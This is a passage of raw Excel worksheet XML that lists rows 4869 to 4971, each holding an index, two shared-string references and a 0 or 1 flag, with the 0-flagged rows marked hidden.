      <c r="A4869" s="1">
        <v>4867.0</v>
      </c>
      <c r="B4869" s="1" t="s">
        <v>2360</v>
      </c>
      <c r="C4869" s="1" t="s">
        <v>3032</v>
      </c>
      <c r="D4869" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4870" hidden="1">
      <c r="A4870" s="1">
        <v>4868.0</v>
      </c>
      <c r="B4870" s="1" t="s">
        <v>347</v>
      </c>
      <c r="C4870" s="1" t="s">
        <v>6918</v>
      </c>
      <c r="D4870" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4871" hidden="1">
      <c r="A4871" s="1">
        <v>4869.0</v>
      </c>
      <c r="B4871" s="1" t="s">
        <v>6919</v>
      </c>
      <c r="C4871" s="1" t="s">
        <v>6920</v>
      </c>
      <c r="D4871" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4872" hidden="1">
      <c r="A4872" s="1">
        <v>4870.0</v>
      </c>
      <c r="B4872" s="1" t="s">
        <v>6921</v>
      </c>
      <c r="C4872" s="1" t="s">
        <v>6922</v>
      </c>
      <c r="D4872" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4873" hidden="1">
      <c r="A4873" s="1">
        <v>4871.0</v>
      </c>
      <c r="B4873" s="1" t="s">
        <v>6864</v>
      </c>
      <c r="C4873" s="1" t="s">
        <v>6865</v>
      </c>
      <c r="D4873" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4874" hidden="1">
      <c r="A4874" s="1">
        <v>4872.0</v>
      </c>
      <c r="B4874" s="1" t="s">
        <v>1925</v>
      </c>
      <c r="C4874" s="1" t="s">
        <v>6923</v>
      </c>
      <c r="D4874" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4875" hidden="1">
      <c r="A4875" s="1">
        <v>4873.0</v>
      </c>
      <c r="B4875" s="1" t="s">
        <v>1064</v>
      </c>
      <c r="C4875" s="1" t="s">
        <v>1065</v>
      </c>
      <c r="D4875" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4876" hidden="1">
      <c r="A4876" s="1">
        <v>4874.0</v>
      </c>
      <c r="B4876" s="1" t="s">
        <v>2415</v>
      </c>
      <c r="C4876" s="1" t="s">
        <v>6924</v>
      </c>
      <c r="D4876" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4877">
      <c r="A4877" s="1">
        <v>4875.0</v>
      </c>
      <c r="B4877" s="1" t="s">
        <v>6697</v>
      </c>
      <c r="C4877" s="1" t="s">
        <v>3557</v>
      </c>
      <c r="D4877" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4878">
      <c r="A4878" s="1">
        <v>4876.0</v>
      </c>
      <c r="B4878" s="1" t="s">
        <v>6925</v>
      </c>
      <c r="C4878" s="1" t="s">
        <v>6926</v>
      </c>
      <c r="D4878" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4879" hidden="1">
      <c r="A4879" s="1">
        <v>4877.0</v>
      </c>
      <c r="B4879" s="1" t="s">
        <v>1181</v>
      </c>
      <c r="C4879" s="1" t="s">
        <v>4505</v>
      </c>
      <c r="D4879" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4880" hidden="1">
      <c r="A4880" s="1">
        <v>4878.0</v>
      </c>
      <c r="B4880" s="1" t="s">
        <v>4009</v>
      </c>
      <c r="C4880" s="1" t="s">
        <v>6927</v>
      </c>
      <c r="D4880" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4881" hidden="1">
      <c r="A4881" s="1">
        <v>4879.0</v>
      </c>
      <c r="B4881" s="1" t="s">
        <v>1890</v>
      </c>
      <c r="C4881" s="1" t="s">
        <v>1891</v>
      </c>
      <c r="D4881" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4882">
      <c r="A4882" s="1">
        <v>4880.0</v>
      </c>
      <c r="B4882" s="1" t="s">
        <v>6928</v>
      </c>
      <c r="C4882" s="1" t="s">
        <v>6929</v>
      </c>
      <c r="D4882" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4883" hidden="1">
      <c r="A4883" s="1">
        <v>4881.0</v>
      </c>
      <c r="B4883" s="1" t="s">
        <v>6930</v>
      </c>
      <c r="C4883" s="1" t="s">
        <v>6931</v>
      </c>
      <c r="D4883" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4884" hidden="1">
      <c r="A4884" s="1">
        <v>4882.0</v>
      </c>
      <c r="B4884" s="1" t="s">
        <v>357</v>
      </c>
      <c r="C4884" s="1" t="s">
        <v>358</v>
      </c>
      <c r="D4884" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4885" hidden="1">
      <c r="A4885" s="1">
        <v>4883.0</v>
      </c>
      <c r="B4885" s="1" t="s">
        <v>257</v>
      </c>
      <c r="C4885" s="1" t="s">
        <v>4565</v>
      </c>
      <c r="D4885" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4886">
      <c r="A4886" s="1">
        <v>4884.0</v>
      </c>
      <c r="B4886" s="1" t="s">
        <v>6932</v>
      </c>
      <c r="C4886" s="1" t="s">
        <v>6933</v>
      </c>
      <c r="D4886" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4887" hidden="1">
      <c r="A4887" s="1">
        <v>4885.0</v>
      </c>
      <c r="B4887" s="1" t="s">
        <v>1008</v>
      </c>
      <c r="C4887" s="1" t="s">
        <v>6934</v>
      </c>
      <c r="D4887" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4888" hidden="1">
      <c r="A4888" s="1">
        <v>4886.0</v>
      </c>
      <c r="B4888" s="1" t="s">
        <v>676</v>
      </c>
      <c r="C4888" s="1" t="s">
        <v>6935</v>
      </c>
      <c r="D4888" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4889">
      <c r="A4889" s="1">
        <v>4887.0</v>
      </c>
      <c r="B4889" s="1" t="s">
        <v>6936</v>
      </c>
      <c r="C4889" s="1" t="s">
        <v>6937</v>
      </c>
      <c r="D4889" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4890" hidden="1">
      <c r="A4890" s="1">
        <v>4888.0</v>
      </c>
      <c r="B4890" s="1" t="s">
        <v>4530</v>
      </c>
      <c r="C4890" s="1" t="s">
        <v>6938</v>
      </c>
      <c r="D4890" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4891" hidden="1">
      <c r="A4891" s="1">
        <v>4889.0</v>
      </c>
      <c r="B4891" s="1" t="s">
        <v>3813</v>
      </c>
      <c r="C4891" s="1" t="s">
        <v>3814</v>
      </c>
      <c r="D4891" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4892" hidden="1">
      <c r="A4892" s="1">
        <v>4890.0</v>
      </c>
      <c r="B4892" s="1" t="s">
        <v>6939</v>
      </c>
      <c r="C4892" s="1" t="s">
        <v>6940</v>
      </c>
      <c r="D4892" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4893" hidden="1">
      <c r="A4893" s="1">
        <v>4891.0</v>
      </c>
      <c r="B4893" s="1" t="s">
        <v>6941</v>
      </c>
      <c r="C4893" s="1" t="s">
        <v>6942</v>
      </c>
      <c r="D4893" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4894" hidden="1">
      <c r="A4894" s="1">
        <v>4892.0</v>
      </c>
      <c r="B4894" s="1" t="s">
        <v>957</v>
      </c>
      <c r="C4894" s="1" t="s">
        <v>1840</v>
      </c>
      <c r="D4894" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4895" hidden="1">
      <c r="A4895" s="1">
        <v>4893.0</v>
      </c>
      <c r="B4895" s="1" t="s">
        <v>5601</v>
      </c>
      <c r="C4895" s="1" t="s">
        <v>5602</v>
      </c>
      <c r="D4895" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4896" hidden="1">
      <c r="A4896" s="1">
        <v>4894.0</v>
      </c>
      <c r="B4896" s="1" t="s">
        <v>3487</v>
      </c>
      <c r="C4896" s="1" t="s">
        <v>6943</v>
      </c>
      <c r="D4896" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4897" hidden="1">
      <c r="A4897" s="1">
        <v>4895.0</v>
      </c>
      <c r="B4897" s="1" t="s">
        <v>923</v>
      </c>
      <c r="C4897" s="1" t="s">
        <v>924</v>
      </c>
      <c r="D4897" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4898" hidden="1">
      <c r="A4898" s="1">
        <v>4896.0</v>
      </c>
      <c r="B4898" s="1" t="s">
        <v>6944</v>
      </c>
      <c r="C4898" s="1" t="s">
        <v>6945</v>
      </c>
      <c r="D4898" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4899" hidden="1">
      <c r="A4899" s="1">
        <v>4897.0</v>
      </c>
      <c r="B4899" s="1" t="s">
        <v>5988</v>
      </c>
      <c r="C4899" s="1" t="s">
        <v>5989</v>
      </c>
      <c r="D4899" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4900" hidden="1">
      <c r="A4900" s="1">
        <v>4898.0</v>
      </c>
      <c r="B4900" s="1" t="s">
        <v>6946</v>
      </c>
      <c r="C4900" s="1" t="s">
        <v>6947</v>
      </c>
      <c r="D4900" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4901">
      <c r="A4901" s="1">
        <v>4899.0</v>
      </c>
      <c r="B4901" s="1" t="s">
        <v>6948</v>
      </c>
      <c r="C4901" s="1" t="s">
        <v>6949</v>
      </c>
      <c r="D4901" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4902">
      <c r="A4902" s="1">
        <v>4900.0</v>
      </c>
      <c r="B4902" s="1" t="s">
        <v>3354</v>
      </c>
      <c r="C4902" s="1" t="s">
        <v>6950</v>
      </c>
      <c r="D4902" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4903" hidden="1">
      <c r="A4903" s="1">
        <v>4901.0</v>
      </c>
      <c r="B4903" s="1" t="s">
        <v>6407</v>
      </c>
      <c r="C4903" s="1" t="s">
        <v>6408</v>
      </c>
      <c r="D4903" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4904" hidden="1">
      <c r="A4904" s="1">
        <v>4902.0</v>
      </c>
      <c r="B4904" s="1" t="s">
        <v>6951</v>
      </c>
      <c r="C4904" s="1" t="s">
        <v>6952</v>
      </c>
      <c r="D4904" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4905" hidden="1">
      <c r="A4905" s="1">
        <v>4903.0</v>
      </c>
      <c r="B4905" s="1" t="s">
        <v>5697</v>
      </c>
      <c r="C4905" s="1" t="s">
        <v>5698</v>
      </c>
      <c r="D4905" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4906">
      <c r="A4906" s="1">
        <v>4904.0</v>
      </c>
      <c r="B4906" s="1" t="s">
        <v>6953</v>
      </c>
      <c r="C4906" s="1" t="s">
        <v>2779</v>
      </c>
      <c r="D4906" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4907" hidden="1">
      <c r="A4907" s="1">
        <v>4905.0</v>
      </c>
      <c r="B4907" s="1" t="s">
        <v>6954</v>
      </c>
      <c r="C4907" s="1" t="s">
        <v>6955</v>
      </c>
      <c r="D4907" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4908">
      <c r="A4908" s="1">
        <v>4906.0</v>
      </c>
      <c r="B4908" s="1" t="s">
        <v>6956</v>
      </c>
      <c r="C4908" s="1" t="s">
        <v>6957</v>
      </c>
      <c r="D4908" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4909" hidden="1">
      <c r="A4909" s="1">
        <v>4907.0</v>
      </c>
      <c r="B4909" s="1" t="s">
        <v>1558</v>
      </c>
      <c r="C4909" s="1" t="s">
        <v>6958</v>
      </c>
      <c r="D4909" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4910">
      <c r="A4910" s="1">
        <v>4908.0</v>
      </c>
      <c r="B4910" s="1" t="s">
        <v>6959</v>
      </c>
      <c r="C4910" s="1" t="s">
        <v>6960</v>
      </c>
      <c r="D4910" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4911" hidden="1">
      <c r="A4911" s="1">
        <v>4909.0</v>
      </c>
      <c r="B4911" s="1" t="s">
        <v>1194</v>
      </c>
      <c r="C4911" s="1" t="s">
        <v>1195</v>
      </c>
      <c r="D4911" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4912">
      <c r="A4912" s="1">
        <v>4910.0</v>
      </c>
      <c r="B4912" s="1" t="s">
        <v>6961</v>
      </c>
      <c r="C4912" s="1" t="s">
        <v>6962</v>
      </c>
      <c r="D4912" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4913" hidden="1">
      <c r="A4913" s="1">
        <v>4911.0</v>
      </c>
      <c r="B4913" s="1" t="s">
        <v>803</v>
      </c>
      <c r="C4913" s="1" t="s">
        <v>6130</v>
      </c>
      <c r="D4913" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4914" hidden="1">
      <c r="A4914" s="1">
        <v>4912.0</v>
      </c>
      <c r="B4914" s="1" t="s">
        <v>6963</v>
      </c>
      <c r="C4914" s="1" t="s">
        <v>6964</v>
      </c>
      <c r="D4914" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4915" hidden="1">
      <c r="A4915" s="1">
        <v>4913.0</v>
      </c>
      <c r="B4915" s="1" t="s">
        <v>5789</v>
      </c>
      <c r="C4915" s="1" t="s">
        <v>5790</v>
      </c>
      <c r="D4915" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4916" hidden="1">
      <c r="A4916" s="1">
        <v>4914.0</v>
      </c>
      <c r="B4916" s="1" t="s">
        <v>6965</v>
      </c>
      <c r="C4916" s="1" t="s">
        <v>6966</v>
      </c>
      <c r="D4916" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4917" hidden="1">
      <c r="A4917" s="1">
        <v>4915.0</v>
      </c>
      <c r="B4917" s="1" t="s">
        <v>3643</v>
      </c>
      <c r="C4917" s="1" t="s">
        <v>6967</v>
      </c>
      <c r="D4917" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4918" hidden="1">
      <c r="A4918" s="1">
        <v>4916.0</v>
      </c>
      <c r="B4918" s="1" t="s">
        <v>5110</v>
      </c>
      <c r="C4918" s="1" t="s">
        <v>5111</v>
      </c>
      <c r="D4918" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4919" hidden="1">
      <c r="A4919" s="1">
        <v>4917.0</v>
      </c>
      <c r="B4919" s="1" t="s">
        <v>124</v>
      </c>
      <c r="C4919" s="1" t="s">
        <v>6968</v>
      </c>
      <c r="D4919" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4920" hidden="1">
      <c r="A4920" s="1">
        <v>4918.0</v>
      </c>
      <c r="B4920" s="1" t="s">
        <v>2854</v>
      </c>
      <c r="C4920" s="1" t="s">
        <v>6969</v>
      </c>
      <c r="D4920" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4921" hidden="1">
      <c r="A4921" s="1">
        <v>4919.0</v>
      </c>
      <c r="B4921" s="1" t="s">
        <v>6801</v>
      </c>
      <c r="C4921" s="1" t="s">
        <v>6802</v>
      </c>
      <c r="D4921" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4922" hidden="1">
      <c r="A4922" s="1">
        <v>4920.0</v>
      </c>
      <c r="B4922" s="1" t="s">
        <v>3163</v>
      </c>
      <c r="C4922" s="1" t="s">
        <v>6970</v>
      </c>
      <c r="D4922" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4923">
      <c r="A4923" s="1">
        <v>4921.0</v>
      </c>
      <c r="B4923" s="1" t="s">
        <v>286</v>
      </c>
      <c r="C4923" s="1" t="s">
        <v>6971</v>
      </c>
      <c r="D4923" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4924" hidden="1">
      <c r="A4924" s="1">
        <v>4922.0</v>
      </c>
      <c r="B4924" s="1" t="s">
        <v>3694</v>
      </c>
      <c r="C4924" s="1" t="s">
        <v>3695</v>
      </c>
      <c r="D4924" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4925" hidden="1">
      <c r="A4925" s="1">
        <v>4923.0</v>
      </c>
      <c r="B4925" s="1" t="s">
        <v>1797</v>
      </c>
      <c r="C4925" s="1" t="s">
        <v>6972</v>
      </c>
      <c r="D4925" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4926" hidden="1">
      <c r="A4926" s="1">
        <v>4924.0</v>
      </c>
      <c r="B4926" s="1" t="s">
        <v>6432</v>
      </c>
      <c r="C4926" s="1" t="s">
        <v>6433</v>
      </c>
      <c r="D4926" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4927" hidden="1">
      <c r="A4927" s="1">
        <v>4925.0</v>
      </c>
      <c r="B4927" s="1" t="s">
        <v>6973</v>
      </c>
      <c r="C4927" s="1" t="s">
        <v>6974</v>
      </c>
      <c r="D4927" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4928" hidden="1">
      <c r="A4928" s="1">
        <v>4926.0</v>
      </c>
      <c r="B4928" s="1" t="s">
        <v>4065</v>
      </c>
      <c r="C4928" s="1" t="s">
        <v>4066</v>
      </c>
      <c r="D4928" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4929">
      <c r="A4929" s="1">
        <v>4927.0</v>
      </c>
      <c r="B4929" s="1" t="s">
        <v>6975</v>
      </c>
      <c r="C4929" s="1" t="s">
        <v>6976</v>
      </c>
      <c r="D4929" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4930" hidden="1">
      <c r="A4930" s="1">
        <v>4928.0</v>
      </c>
      <c r="B4930" s="1" t="s">
        <v>3444</v>
      </c>
      <c r="C4930" s="1" t="s">
        <v>3445</v>
      </c>
      <c r="D4930" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4931" hidden="1">
      <c r="A4931" s="1">
        <v>4929.0</v>
      </c>
      <c r="B4931" s="1" t="s">
        <v>1382</v>
      </c>
      <c r="C4931" s="1" t="s">
        <v>6977</v>
      </c>
      <c r="D4931" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4932" hidden="1">
      <c r="A4932" s="1">
        <v>4930.0</v>
      </c>
      <c r="B4932" s="1" t="s">
        <v>4206</v>
      </c>
      <c r="C4932" s="1" t="s">
        <v>4207</v>
      </c>
      <c r="D4932" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4933" hidden="1">
      <c r="A4933" s="1">
        <v>4931.0</v>
      </c>
      <c r="B4933" s="1" t="s">
        <v>1841</v>
      </c>
      <c r="C4933" s="1" t="s">
        <v>1842</v>
      </c>
      <c r="D4933" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4934" hidden="1">
      <c r="A4934" s="1">
        <v>4932.0</v>
      </c>
      <c r="B4934" s="1" t="s">
        <v>5754</v>
      </c>
      <c r="C4934" s="1" t="s">
        <v>5755</v>
      </c>
      <c r="D4934" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4935" hidden="1">
      <c r="A4935" s="1">
        <v>4933.0</v>
      </c>
      <c r="B4935" s="1" t="s">
        <v>1139</v>
      </c>
      <c r="C4935" s="1" t="s">
        <v>6978</v>
      </c>
      <c r="D4935" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4936" hidden="1">
      <c r="A4936" s="1">
        <v>4934.0</v>
      </c>
      <c r="B4936" s="1" t="s">
        <v>3613</v>
      </c>
      <c r="C4936" s="1" t="s">
        <v>3614</v>
      </c>
      <c r="D4936" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4937" hidden="1">
      <c r="A4937" s="1">
        <v>4935.0</v>
      </c>
      <c r="B4937" s="1" t="s">
        <v>1027</v>
      </c>
      <c r="C4937" s="1" t="s">
        <v>5486</v>
      </c>
      <c r="D4937" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4938" hidden="1">
      <c r="A4938" s="1">
        <v>4936.0</v>
      </c>
      <c r="B4938" s="1" t="s">
        <v>5677</v>
      </c>
      <c r="C4938" s="1" t="s">
        <v>5678</v>
      </c>
      <c r="D4938" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4939">
      <c r="A4939" s="1">
        <v>4937.0</v>
      </c>
      <c r="B4939" s="1" t="s">
        <v>6979</v>
      </c>
      <c r="C4939" s="1" t="s">
        <v>6980</v>
      </c>
      <c r="D4939" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4940">
      <c r="A4940" s="1">
        <v>4938.0</v>
      </c>
      <c r="B4940" s="1" t="s">
        <v>6981</v>
      </c>
      <c r="C4940" s="1" t="s">
        <v>6982</v>
      </c>
      <c r="D4940" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4941">
      <c r="A4941" s="1">
        <v>4939.0</v>
      </c>
      <c r="B4941" s="1" t="s">
        <v>3856</v>
      </c>
      <c r="C4941" s="1" t="s">
        <v>3857</v>
      </c>
      <c r="D4941" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4942" hidden="1">
      <c r="A4942" s="1">
        <v>4940.0</v>
      </c>
      <c r="B4942" s="1" t="s">
        <v>2325</v>
      </c>
      <c r="C4942" s="1" t="s">
        <v>2326</v>
      </c>
      <c r="D4942" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4943" hidden="1">
      <c r="A4943" s="1">
        <v>4941.0</v>
      </c>
      <c r="B4943" s="1" t="s">
        <v>6983</v>
      </c>
      <c r="C4943" s="1" t="s">
        <v>6984</v>
      </c>
      <c r="D4943" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4944" hidden="1">
      <c r="A4944" s="1">
        <v>4942.0</v>
      </c>
      <c r="B4944" s="1" t="s">
        <v>6985</v>
      </c>
      <c r="C4944" s="1" t="s">
        <v>6986</v>
      </c>
      <c r="D4944" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4945" hidden="1">
      <c r="A4945" s="1">
        <v>4943.0</v>
      </c>
      <c r="B4945" s="1" t="s">
        <v>2571</v>
      </c>
      <c r="C4945" s="1" t="s">
        <v>6987</v>
      </c>
      <c r="D4945" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4946" hidden="1">
      <c r="A4946" s="1">
        <v>4944.0</v>
      </c>
      <c r="B4946" s="1" t="s">
        <v>667</v>
      </c>
      <c r="C4946" s="1" t="s">
        <v>668</v>
      </c>
      <c r="D4946" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4947" hidden="1">
      <c r="A4947" s="1">
        <v>4945.0</v>
      </c>
      <c r="B4947" s="1" t="s">
        <v>6988</v>
      </c>
      <c r="C4947" s="1" t="s">
        <v>6989</v>
      </c>
      <c r="D4947" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4948" hidden="1">
      <c r="A4948" s="1">
        <v>4946.0</v>
      </c>
      <c r="B4948" s="1" t="s">
        <v>42</v>
      </c>
      <c r="C4948" s="1" t="s">
        <v>6990</v>
      </c>
      <c r="D4948" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4949" hidden="1">
      <c r="A4949" s="1">
        <v>4947.0</v>
      </c>
      <c r="B4949" s="1" t="s">
        <v>1266</v>
      </c>
      <c r="C4949" s="1" t="s">
        <v>1267</v>
      </c>
      <c r="D4949" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4950" hidden="1">
      <c r="A4950" s="1">
        <v>4948.0</v>
      </c>
      <c r="B4950" s="1" t="s">
        <v>2571</v>
      </c>
      <c r="C4950" s="1" t="s">
        <v>4553</v>
      </c>
      <c r="D4950" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4951" hidden="1">
      <c r="A4951" s="1">
        <v>4949.0</v>
      </c>
      <c r="B4951" s="1" t="s">
        <v>452</v>
      </c>
      <c r="C4951" s="1" t="s">
        <v>6991</v>
      </c>
      <c r="D4951" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4952">
      <c r="A4952" s="1">
        <v>4950.0</v>
      </c>
      <c r="B4952" s="1" t="s">
        <v>5062</v>
      </c>
      <c r="C4952" s="1" t="s">
        <v>6992</v>
      </c>
      <c r="D4952" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4953" hidden="1">
      <c r="A4953" s="1">
        <v>4951.0</v>
      </c>
      <c r="B4953" s="1" t="s">
        <v>6993</v>
      </c>
      <c r="C4953" s="1" t="s">
        <v>6994</v>
      </c>
      <c r="D4953" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4954" hidden="1">
      <c r="A4954" s="1">
        <v>4952.0</v>
      </c>
      <c r="B4954" s="1" t="s">
        <v>6995</v>
      </c>
      <c r="C4954" s="1" t="s">
        <v>6996</v>
      </c>
      <c r="D4954" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4955">
      <c r="A4955" s="1">
        <v>4953.0</v>
      </c>
      <c r="B4955" s="1" t="s">
        <v>6997</v>
      </c>
      <c r="C4955" s="1" t="s">
        <v>6998</v>
      </c>
      <c r="D4955" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4956">
      <c r="A4956" s="1">
        <v>4954.0</v>
      </c>
      <c r="B4956" s="1" t="s">
        <v>6999</v>
      </c>
      <c r="C4956" s="1" t="s">
        <v>7000</v>
      </c>
      <c r="D4956" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4957">
      <c r="A4957" s="1">
        <v>4955.0</v>
      </c>
      <c r="B4957" s="1" t="s">
        <v>7001</v>
      </c>
      <c r="C4957" s="1" t="s">
        <v>7002</v>
      </c>
      <c r="D4957" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4958" hidden="1">
      <c r="A4958" s="1">
        <v>4956.0</v>
      </c>
      <c r="B4958" s="1" t="s">
        <v>7003</v>
      </c>
      <c r="C4958" s="1" t="s">
        <v>7004</v>
      </c>
      <c r="D4958" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4959" hidden="1">
      <c r="A4959" s="1">
        <v>4957.0</v>
      </c>
      <c r="B4959" s="1" t="s">
        <v>5087</v>
      </c>
      <c r="C4959" s="1" t="s">
        <v>5088</v>
      </c>
      <c r="D4959" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4960" hidden="1">
      <c r="A4960" s="1">
        <v>4958.0</v>
      </c>
      <c r="B4960" s="1" t="s">
        <v>7005</v>
      </c>
      <c r="C4960" s="1" t="s">
        <v>7006</v>
      </c>
      <c r="D4960" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4961" hidden="1">
      <c r="A4961" s="1">
        <v>4959.0</v>
      </c>
      <c r="B4961" s="1" t="s">
        <v>7007</v>
      </c>
      <c r="C4961" s="1" t="s">
        <v>7008</v>
      </c>
      <c r="D4961" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4962" hidden="1">
      <c r="A4962" s="1">
        <v>4960.0</v>
      </c>
      <c r="B4962" s="1" t="s">
        <v>986</v>
      </c>
      <c r="C4962" s="1" t="s">
        <v>7009</v>
      </c>
      <c r="D4962" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4963" hidden="1">
      <c r="A4963" s="1">
        <v>4961.0</v>
      </c>
      <c r="B4963" s="1" t="s">
        <v>7010</v>
      </c>
      <c r="C4963" s="1" t="s">
        <v>7011</v>
      </c>
      <c r="D4963" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4964">
      <c r="A4964" s="1">
        <v>4962.0</v>
      </c>
      <c r="B4964" s="1" t="s">
        <v>2868</v>
      </c>
      <c r="C4964" s="1" t="s">
        <v>7012</v>
      </c>
      <c r="D4964" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4965" hidden="1">
      <c r="A4965" s="1">
        <v>4963.0</v>
      </c>
      <c r="B4965" s="1" t="s">
        <v>3643</v>
      </c>
      <c r="C4965" s="1" t="s">
        <v>5649</v>
      </c>
      <c r="D4965" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4966" hidden="1">
      <c r="A4966" s="1">
        <v>4964.0</v>
      </c>
      <c r="B4966" s="1" t="s">
        <v>3502</v>
      </c>
      <c r="C4966" s="1" t="s">
        <v>3503</v>
      </c>
      <c r="D4966" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4967" hidden="1">
      <c r="A4967" s="1">
        <v>4965.0</v>
      </c>
      <c r="B4967" s="1" t="s">
        <v>216</v>
      </c>
      <c r="C4967" s="1" t="s">
        <v>7013</v>
      </c>
      <c r="D4967" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4968">
      <c r="A4968" s="1">
        <v>4966.0</v>
      </c>
      <c r="B4968" s="1" t="s">
        <v>7014</v>
      </c>
      <c r="C4968" s="1" t="s">
        <v>7015</v>
      </c>
      <c r="D4968" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4969" hidden="1">
      <c r="A4969" s="1">
        <v>4967.0</v>
      </c>
      <c r="B4969" s="1" t="s">
        <v>5736</v>
      </c>
      <c r="C4969" s="1" t="s">
        <v>5737</v>
      </c>
      <c r="D4969" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4970" hidden="1">
      <c r="A4970" s="1">
        <v>4968.0</v>
      </c>
      <c r="B4970" s="1" t="s">
        <v>1423</v>
      </c>
      <c r="C4970" s="1" t="s">
        <v>7016</v>
      </c>
      <c r="D4970" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4971">
      <c r="A4971" s="1">
        <v>4969.0</v>
      </c>
      <c r="B4971" s="1" t="s">
        <v>6948</v>
      </c>
      <c r="C4971" s="1" t="s">
        <v>7017</v>
      </c>
      <c r="D4971" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4972">
      <c r="A4972" s="1">
